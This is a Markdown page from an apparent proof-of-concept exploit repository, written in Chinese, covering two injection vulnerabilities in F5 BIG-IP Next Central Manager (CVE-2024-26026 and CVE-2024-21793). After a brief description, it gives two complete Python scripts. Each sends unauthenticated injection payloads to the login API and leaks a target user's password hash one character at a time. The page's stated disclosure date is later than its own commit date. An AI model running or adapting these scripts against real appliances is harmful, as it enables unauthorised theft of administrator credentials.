admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/F5-BIG-IP/F5-BIG-IP存在SQL注入漏洞(CVE-2024-26026)&(CVE-2024-21793).md

95 lines
3.3 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
## F5-BIG-IP存在SQL注入漏洞(CVE-2024-26026)&(CVE-2024-21793)
F5 BIG-IP Next Central Manager 可用于全面管理、自动化和监控部署在任何地方的众多 BIG-IP Next 实例。2025年5月8日官方披露其存在CVE-2024-26026&CVE-2024-21793 F5 BIG-IP Next Central Manager SQL注入漏洞攻击者可在无需登陆的情况下利用注入获取数据库中的敏感信息。
## CVE-2024-26026
```python
import string
import requests
import urllib3
import argparse
urllib3.disable_warnings()
def encode_string(s: str) -> str:
return ",".join([f"chr({ord(c)})" for c in s])
def leak_hash(target: str, target_user: str = "admin"):
charset = string.digits + string.ascii_letters + '/.$'
encoded_user = encode_string(target_user)
URL = f"{target}/api/login"
current_guess = ''
while True:
guessed = False
for guess in charset:
full_guess = encode_string(current_guess + guess + '%')
stuff = requests.post(URL, json={
"username": "fake_user",
"password": "password",
"provider_type": "LDAP",
"provider_name": f"LDAPP'or' name = (select case when (password like concat({full_guess})) then chr(76)||chr(111)||chr(99)||chr(97)||chr(108) else chr(76) end from mbiq_system.users where username like concat({encoded_user}) limit 1)"
}, verify=False).json()
if "root distinguished name is required" in stuff["message"]:
guessed = True
current_guess += guess
print("[+]", current_guess)
break
if not guessed:
break
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Leak the admin password hash')
parser.add_argument('target', type=str, help='The target URL')
parser.add_argument('target_user', type=str, help='The target user', default='admin', nargs='?')
args = parser.parse_args()
leak_hash(args.target, args.target_user)
```
## CVE-2024-21793
```python
import string
import requests
import urllib3
import argparse
urllib3.disable_warnings()
def leak_hash(target: str, target_user: str = "admin"):
URL = f"{target}/api/login"
charset = string.digits + string.ascii_letters + '/.$'
current_guess = ''
while True:
guessed = False
for guess in charset:
full_guess = current_guess + guess
stuff = requests.post(URL, json={
"username": f"fakeuser' or 'username' eq '{target_user}' and startswith('password','{full_guess}') or 'username' eq '1",
"password": "password",
"provider_type": "LDAP",
"provider_name": "LDAP"
}, verify=False).json()
if stuff["status"] == 500:
guessed = True
current_guess += guess
print("[+]", current_guess)
break
if not guessed:
break
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Leak the admin password hash')
parser.add_argument('target', type=str, help='The target URL')
parser.add_argument('target_user', type=str, help='The target user', default='admin', nargs='?')
args = parser.parse_args()
leak_hash(args.target, args.target_user)
```
Reference in New Issue Copy Permalink